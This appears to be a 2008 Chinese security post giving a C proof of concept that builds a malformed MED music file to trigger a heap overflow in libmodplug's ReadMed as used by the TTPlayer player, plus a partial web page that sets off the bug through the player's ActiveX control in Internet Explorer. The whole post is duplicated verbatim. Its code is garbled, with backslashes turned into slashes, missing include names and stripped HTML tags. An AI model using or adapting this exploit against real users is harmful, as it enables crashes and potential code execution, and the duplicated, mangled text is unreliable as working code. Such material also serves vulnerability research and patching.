千千静听 med 文件格式堆溢出
下面是构造问题文件的代码,最后是使用最新版本千千静听的 ax 写的 poc.
/*
libmodplug v0.8
load_med.cpp
BOOL CSoundFile::ReadMed(const BYTE *lpStream, DWORD dwMemLength)
line 670: memcpy(m_lpszSongComments, lpStream+annotxt, annolen);
*/
/*
author: 耿冬
e-mail: lcwlgsgd@163.com
date: 2008/02/25
*/
#include
#include
#pragma pack(1)
// On-disk MMD module header as laid out by libmodplug's load_med.cpp (see the
// file comment above). Packed via the surrounding #pragma pack(1) so that
// sizeof() equals the on-disk size; the offset fields are stored big-endian,
// which is why main() writes them through bswapBE32().
typedef struct tagMEDMODULEHEADER
{
DWORD id; // magic: MMD1-MMD3 per the original comment; this PoC writes "MMD0" (see main)
DWORD modlen; // Size of file (left 0 by the PoC)
DWORD song; // Position in file for this song (the MMD0SONGHEADER)
WORD psecnum;
WORD pseq;
DWORD blockarr; // Position in file for blocks
DWORD mmdflags;
DWORD smplarr; // Position in file for samples
DWORD reserved;
DWORD expdata; // Absolute offset in file for ExpData (0 if not present) -- the MMD0EXP block that carries annotxt/annolen
DWORD reserved2;
WORD pstate;
WORD pblock;
WORD pline;
WORD pseqnum;
WORD actplayline;
BYTE counter;
BYTE extra_songs; // # of songs - 1
} MEDMODULEHEADER;
// Per-sample entry of the MMD0 song header (63 of these open MMD0SONGHEADER).
// Every field is left zero by this PoC; the names below are as in the parser.
typedef struct tagMMD0SAMPLE
{
WORD rep, replen; // loop fields by name -- not set here
BYTE midich; // MIDI-related by name -- not set here
BYTE midipreset;
BYTE svol; // sample volume by name -- not set here
signed char strans; // sample transpose by name -- not set here
} MMD0SAMPLE;
// MMD0/MMD1 song header
// MMD0/MMD1 song header. The PoC writes an all-zero instance of this block
// directly after the module header; only its sizeof() matters, because it is
// used to compute the file offset stored in MEDMODULEHEADER.expdata.
typedef struct tagMMD0SONGHEADER
{
MMD0SAMPLE sample[63]; // one entry per possible sample
WORD numblocks; // # of blocks
WORD songlen; // # of entries used in playseq
BYTE playseq[256]; // Play sequence
WORD deftempo; // BPM tempo
signed char playtransp; // Play transpose
BYTE flags; // 0x10: Hex Volumes | 0x20: ST/NT/PT Slides | 0x40: 8 Channels song
BYTE flags2; // [b4-b0]+1: Tempo LPB, 0x20: tempo mode, 0x80: mix_conv=on
BYTE tempo2; // tempo TPL
BYTE trkvol[16]; // track volumes
BYTE mastervol; // master volume
BYTE numsamples; // # of samples (max=63)
} MMD0SONGHEADER;
// MMD "expansion" block, reached through MEDMODULEHEADER.expdata. This is the
// structure the PoC actually abuses: annotxt/annolen describe the song
// comment, and per the file comment load_med.cpp line 670 hands annolen to
// memcpy as-is. A robust loader must check that annotxt < dwMemLength and
// annolen <= dwMemLength - annotxt before copying.
typedef struct tagMMD0EXP
{
DWORD nextmod; // File offset of next Hdr
DWORD exp_smp; // Pointer to extra instrument data
WORD s_ext_entries; // Number of extra instrument entries
WORD s_ext_entrsz; // Size of extra instrument data
DWORD annotxt; // File offset of the annotation (song comment) text
DWORD annolen; // Byte length of that text -- attacker-controlled, set to 0xFFFFFFFF by the PoC
DWORD iinfo; // Instrument names
WORD i_ext_entries;
WORD i_ext_entrsz;
DWORD jumpmask;
DWORD rgbtable;
BYTE channelsplit[4]; // Only used if 8ch_conv (extra channel for every nonzero entry)
DWORD n_info;
DWORD songname; // Song name
DWORD songnamelen;
DWORD dumps;
DWORD mmdinfo;
DWORD mmdrexx;
DWORD mmdcmd3x;
DWORD trackinfo_ofs; // ptr to song->numtracks ptrs to tag lists
DWORD effectinfo_ofs; // ptr to group ptrs
DWORD tag_end;
} MMD0EXP;
#pragma pack()
// Byte swapping functions from the GNU C Library and libsdl
/* Swap bytes in 16 bit value. */
#ifdef __GNUC__
# define bswap_16(x) /
(__extension__ /
({ unsigned short int __bsx = (x); /
((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8)); }))
#else
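/* Swap the two bytes of a 16-bit value.
 * Portable fallback for compilers without the GNU statement-expression macro.
 * Parameter renamed from __bsx: identifiers starting with a double underscore
 * are reserved for the implementation; `inline` is the C99 spelling of the
 * non-standard `__inline`. */
static inline unsigned short int
bswap_16 (unsigned short int v)
{
    return (unsigned short int)(((v >> 8) & 0xffu) | ((v & 0xffu) << 8));
}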
#endif
/* Swap bytes in 32 bit value. */
#ifdef __GNUC__
# define bswap_32(x) /
(__extension__ /
({ unsigned int __bsx = (x); /
((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) | /
(((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24)); }))
#else
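/* Reverse the byte order of a 32-bit value.
 * Portable fallback for compilers without the GNU statement-expression macro.
 * Parameter renamed from __bsx (reserved identifier) and `__inline` replaced by
 * standard `inline`; the masks are unsigned so no shift touches a signed value. */
static inline unsigned int
bswap_32 (unsigned int v)
{
    return ((v & 0xff000000u) >> 24) | ((v & 0x00ff0000u) >> 8) |
           ((v & 0x0000ff00u) << 8)  | ((v & 0x000000ffu) << 24);
}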
#endif
#ifdef WORDS_BIGENDIAN
#define bswapLE16(X) bswap_16(X)
#define bswapLE32(X) bswap_32(X)
#define bswapBE16(X) (X)
#define bswapBE32(X) (X)
#else
#define bswapLE16(X) (X)
#define bswapLE32(X) (X)
#define bswapBE16(X) bswap_16(X)
#define bswapBE32(X) bswap_32(X)
#endif
// Writes the proof-of-concept module file: three zero-filled headers laid out
// back-to-back (module header, song header, expansion block) followed by
// filler up to 0x1000 bytes. The expansion block's annolen is set to
// 0xFFFFFFFF while annotxt points just past the headers, so a loader that
// passes annolen straight to memcpy (load_med.cpp line 670, see the file
// comment) is asked to copy 4 GiB out of a 4 KiB buffer. The parser-side fix
// is to reject annotxt/annolen values that do not fit inside dwMemLength
// before the copy.
//
// NOTE(review): the "/n" in the printf strings and the "/" continuations in
// the bswap macros look like "\" characters lost in extraction, and the two
// empty #include lines above lost their header names (stdio.h, string.h and
// whatever defines DWORD/WORD/BYTE are needed). Code is left as found.
// Only fopen's result is checked; fwrite, ftell and fclose are not.
int main()
{
MEDMODULEHEADER mmh; // module header, written first
MMD0SONGHEADER msh; // song header, stays all zero
MMD0EXP mex; // expansion block carrying annotxt/annolen
FILE* file;
long p; // running file offset used to fill in the offset fields
memset(&mmh, 0, sizeof (mmh));
memset(&msh, 0, sizeof (msh));
memset(&mex, 0, sizeof (mex));
p = 0;
mmh.id = 0x30444D4D; // bytes 'M','M','D','0' on a little-endian host: version '0'
p += sizeof (MEDMODULEHEADER);
mmh.song = bswapBE32(p); // song header immediately follows the module header
p += sizeof (MMD0SONGHEADER);
mmh.expdata = bswapBE32(p); // expansion block follows the song header
p += sizeof (MMD0EXP);
mex.annolen = bswapBE32(-1); // 0xFFFFFFFF: the unvalidated copy length
mex.annotxt = bswapBE32(p); // "annotation text" starts right after the headers
file = fopen("test.s3m", "wb+"); // extension is .s3m although the content is MED
if ( file == NULL )
{
printf("create file failed!/n");
}
else
{
fwrite(&mmh, 1, sizeof (mmh), file);
fwrite(&msh, 1, sizeof (msh), file);
fwrite(&mex, 1, sizeof (mex), file);
while ( ftell(file) < 0x1000 ) // pad to 4 KiB, 16 'A's per iteration (the literal holds 20)
{
fwrite("AAAAAAAAAAAAAAAAAAAA", 1, 16, file);
}
fclose(file);
printf("successed!/n");
}
return 0;
}
/*
最新的千千静听提供了 ax，下面是在 IE 中触发此漏洞的页面，会导致 IE 崩溃。
*/
"ttp" WIDTH="250" HEIGHT="400" CLASSID="CLSID:89AE5F82-410A-4040-9387-68D1144EFD03">
"button" NAME="test" CAPTION="test" xxxxx="Test()">
"JavaScript">
/*
libmodplug v0.8
load_med.cpp
BOOL CSoundFile::ReadMed(const BYTE *lpStream, DWORD dwMemLength)
line 670: memcpy(m_lpszSongComments, lpStream+annotxt, annolen);
*/
/*
author: 耿冬
e-mail: lcwlgsgd@163.com
date: 2008/02/25
*/
#include
#include
#pragma pack(1)
// On-disk MMD module header as laid out by libmodplug's load_med.cpp (see the
// file comment above). Packed via the surrounding #pragma pack(1) so that
// sizeof() equals the on-disk size; the offset fields are stored big-endian,
// which is why main() writes them through bswapBE32().
typedef struct tagMEDMODULEHEADER
{
DWORD id; // magic: MMD1-MMD3 per the original comment; this PoC writes "MMD0" (see main)
DWORD modlen; // Size of file (left 0 by the PoC)
DWORD song; // Position in file for this song (the MMD0SONGHEADER)
WORD psecnum;
WORD pseq;
DWORD blockarr; // Position in file for blocks
DWORD mmdflags;
DWORD smplarr; // Position in file for samples
DWORD reserved;
DWORD expdata; // Absolute offset in file for ExpData (0 if not present) -- the MMD0EXP block that carries annotxt/annolen
DWORD reserved2;
WORD pstate;
WORD pblock;
WORD pline;
WORD pseqnum;
WORD actplayline;
BYTE counter;
BYTE extra_songs; // # of songs - 1
} MEDMODULEHEADER;
// Per-sample entry of the MMD0 song header (63 of these open MMD0SONGHEADER).
// Every field is left zero by this PoC; the names below are as in the parser.
typedef struct tagMMD0SAMPLE
{
WORD rep, replen; // loop fields by name -- not set here
BYTE midich; // MIDI-related by name -- not set here
BYTE midipreset;
BYTE svol; // sample volume by name -- not set here
signed char strans; // sample transpose by name -- not set here
} MMD0SAMPLE;
// MMD0/MMD1 song header
// MMD0/MMD1 song header. The PoC writes an all-zero instance of this block
// directly after the module header; only its sizeof() matters, because it is
// used to compute the file offset stored in MEDMODULEHEADER.expdata.
typedef struct tagMMD0SONGHEADER
{
MMD0SAMPLE sample[63]; // one entry per possible sample
WORD numblocks; // # of blocks
WORD songlen; // # of entries used in playseq
BYTE playseq[256]; // Play sequence
WORD deftempo; // BPM tempo
signed char playtransp; // Play transpose
BYTE flags; // 0x10: Hex Volumes | 0x20: ST/NT/PT Slides | 0x40: 8 Channels song
BYTE flags2; // [b4-b0]+1: Tempo LPB, 0x20: tempo mode, 0x80: mix_conv=on
BYTE tempo2; // tempo TPL
BYTE trkvol[16]; // track volumes
BYTE mastervol; // master volume
BYTE numsamples; // # of samples (max=63)
} MMD0SONGHEADER;
// MMD "expansion" block, reached through MEDMODULEHEADER.expdata. This is the
// structure the PoC actually abuses: annotxt/annolen describe the song
// comment, and per the file comment load_med.cpp line 670 hands annolen to
// memcpy as-is. A robust loader must check that annotxt < dwMemLength and
// annolen <= dwMemLength - annotxt before copying.
typedef struct tagMMD0EXP
{
DWORD nextmod; // File offset of next Hdr
DWORD exp_smp; // Pointer to extra instrument data
WORD s_ext_entries; // Number of extra instrument entries
WORD s_ext_entrsz; // Size of extra instrument data
DWORD annotxt; // File offset of the annotation (song comment) text
DWORD annolen; // Byte length of that text -- attacker-controlled, set to 0xFFFFFFFF by the PoC
DWORD iinfo; // Instrument names
WORD i_ext_entries;
WORD i_ext_entrsz;
DWORD jumpmask;
DWORD rgbtable;
BYTE channelsplit[4]; // Only used if 8ch_conv (extra channel for every nonzero entry)
DWORD n_info;
DWORD songname; // Song name
DWORD songnamelen;
DWORD dumps;
DWORD mmdinfo;
DWORD mmdrexx;
DWORD mmdcmd3x;
DWORD trackinfo_ofs; // ptr to song->numtracks ptrs to tag lists
DWORD effectinfo_ofs; // ptr to group ptrs
DWORD tag_end;
} MMD0EXP;
#pragma pack()
// Byte swapping functions from the GNU C Library and libsdl
/* Swap bytes in 16 bit value. */
#ifdef __GNUC__
# define bswap_16(x) /
(__extension__ /
({ unsigned short int __bsx = (x); /
((((__bsx) >> 8) & 0xff) | (((__bsx) & 0xff) << 8)); }))
#else
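/* Swap the two bytes of a 16-bit value.
 * Portable fallback for compilers without the GNU statement-expression macro.
 * Parameter renamed from __bsx: identifiers starting with a double underscore
 * are reserved for the implementation; `inline` is the C99 spelling of the
 * non-standard `__inline`. */
static inline unsigned short int
bswap_16 (unsigned short int v)
{
    return (unsigned short int)(((v >> 8) & 0xffu) | ((v & 0xffu) << 8));
}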
#endif
/* Swap bytes in 32 bit value. */
#ifdef __GNUC__
# define bswap_32(x) /
(__extension__ /
({ unsigned int __bsx = (x); /
((((__bsx) & 0xff000000) >> 24) | (((__bsx) & 0x00ff0000) >> 8) | /
(((__bsx) & 0x0000ff00) << 8) | (((__bsx) & 0x000000ff) << 24)); }))
#else
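/* Reverse the byte order of a 32-bit value.
 * Portable fallback for compilers without the GNU statement-expression macro.
 * Parameter renamed from __bsx (reserved identifier) and `__inline` replaced by
 * standard `inline`; the masks are unsigned so no shift touches a signed value. */
static inline unsigned int
bswap_32 (unsigned int v)
{
    return ((v & 0xff000000u) >> 24) | ((v & 0x00ff0000u) >> 8) |
           ((v & 0x0000ff00u) << 8)  | ((v & 0x000000ffu) << 24);
}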
#endif
#ifdef WORDS_BIGENDIAN
#define bswapLE16(X) bswap_16(X)
#define bswapLE32(X) bswap_32(X)
#define bswapBE16(X) (X)
#define bswapBE32(X) (X)
#else
#define bswapLE16(X) (X)
#define bswapLE32(X) (X)
#define bswapBE16(X) bswap_16(X)
#define bswapBE32(X) bswap_32(X)
#endif
// Writes the proof-of-concept module file: three zero-filled headers laid out
// back-to-back (module header, song header, expansion block) followed by
// filler up to 0x1000 bytes. The expansion block's annolen is set to
// 0xFFFFFFFF while annotxt points just past the headers, so a loader that
// passes annolen straight to memcpy (load_med.cpp line 670, see the file
// comment) is asked to copy 4 GiB out of a 4 KiB buffer. The parser-side fix
// is to reject annotxt/annolen values that do not fit inside dwMemLength
// before the copy.
//
// NOTE(review): the "/n" in the printf strings and the "/" continuations in
// the bswap macros look like "\" characters lost in extraction, and the two
// empty #include lines above lost their header names (stdio.h, string.h and
// whatever defines DWORD/WORD/BYTE are needed). Code is left as found.
// Only fopen's result is checked; fwrite, ftell and fclose are not.
int main()
{
MEDMODULEHEADER mmh; // module header, written first
MMD0SONGHEADER msh; // song header, stays all zero
MMD0EXP mex; // expansion block carrying annotxt/annolen
FILE* file;
long p; // running file offset used to fill in the offset fields
memset(&mmh, 0, sizeof (mmh));
memset(&msh, 0, sizeof (msh));
memset(&mex, 0, sizeof (mex));
p = 0;
mmh.id = 0x30444D4D; // bytes 'M','M','D','0' on a little-endian host: version '0'
p += sizeof (MEDMODULEHEADER);
mmh.song = bswapBE32(p); // song header immediately follows the module header
p += sizeof (MMD0SONGHEADER);
mmh.expdata = bswapBE32(p); // expansion block follows the song header
p += sizeof (MMD0EXP);
mex.annolen = bswapBE32(-1); // 0xFFFFFFFF: the unvalidated copy length
mex.annotxt = bswapBE32(p); // "annotation text" starts right after the headers
file = fopen("test.s3m", "wb+"); // extension is .s3m although the content is MED
if ( file == NULL )
{
printf("create file failed!/n");
}
else
{
fwrite(&mmh, 1, sizeof (mmh), file);
fwrite(&msh, 1, sizeof (msh), file);
fwrite(&mex, 1, sizeof (mex), file);
while ( ftell(file) < 0x1000 ) // pad to 4 KiB, 16 'A's per iteration (the literal holds 20)
{
fwrite("AAAAAAAAAAAAAAAAAAAA", 1, 16, file);
}
fclose(file);
printf("successed!/n");
}
return 0;
}
/*
最新的千千静听提供了 ax，下面是在 IE 中触发此漏洞的页面，会导致 IE 崩溃。
*/
"ttp" WIDTH="250" HEIGHT="400" CLASSID="CLSID:89AE5F82-410A-4040-9387-68D1144EFD03">
"button" NAME="test" CAPTION="test" xxxxx="Test()">
"JavaScript">